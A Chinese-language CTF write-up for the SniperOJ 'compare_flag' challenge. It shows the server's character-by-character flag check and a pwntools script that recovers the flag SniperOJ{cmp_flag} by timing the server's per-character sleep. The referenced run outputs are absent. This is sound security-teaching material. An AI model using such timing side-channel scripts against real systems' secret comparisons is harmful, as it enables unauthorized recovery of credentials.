SniperOj-compare_flag-Writeup

题干如上，只给了一个nc命令，那么连接到服务器如下

有如下的python代码

 1 #!/usr/bin/env python
 2
 3 from time import sleep
 4 from flag import flag
 5 import sys
 6
 7 def compare_flag(input_flag):
 8     length = len(input_flag)
 9     if(length == 0):
10         return False
11     if(length > len(flag)):
12         return False
13     if input_flag.lower() == "exit":
14         exit(1)
15     for i in range(length):
16         if input_flag[i] != flag[i]:
17             return False
18         sleep(0.25)
19     return True
20
21
22 with open(__file__) as f:
23     code = list(f)
24     for i in code:
25         sys.stdout.write(i)
26         sys.stdout.flush()
27
28 for i in range(0x10000):
29     sys.stdout.write("Give me flag:")
30     sys.stdout.flush()
31     input_flag = raw_input()
32     compare_flag(input_flag)
33
34
35 Give me flag:

flag文件是保存在服务器上的，一时感觉无从下手，后来参考了UIUCTF的一道类似题目，分析如下：

该程序会比较输入的字符串与flag的对应位，当当前输入的字符串属于flag的子段时，程序会sleep(0.25)

因此通过观察时间间隔，我们就可以确定当前的字符串与flag的对应位是否相等，写了一个比较的脚本如下

 1 import string
 2 import time
 3 import sys
 4 from pwn import *
 5
 6 io = remote(‘www.sniperoj.cn‘, 30018)
 7 res = sys.argv[1] if len(sys.argv) > 1 else ‘‘
 8
 9 io.recvuntil(‘Give me flag:‘)
10 io.recvuntil(‘Give me flag:‘)
11 #s = io.recvuntil(‘flag:‘)
12 #print s
13
14 for c in "_}"+ string.ascii_letters + string.digits:
15     io.sendline(res + c)
16     start = time.time()
17     io.recvuntil(‘Give me flag:‘)
18 #    s = io.recvline()
19 #    print s
20     end = time.time()
21     print c, int((end - start) * 100)
22
23 io.close()

#根据flag形式，第一次先传入SniperOJ{，运行结果如下

因此可确定下一位的字符是c

#第二次传入SniperOJ{c，运行结果如下

因此确定下一位字符为m

多次运行，每次确定一位，最终得到flag为SniperOJ{cmp_flag}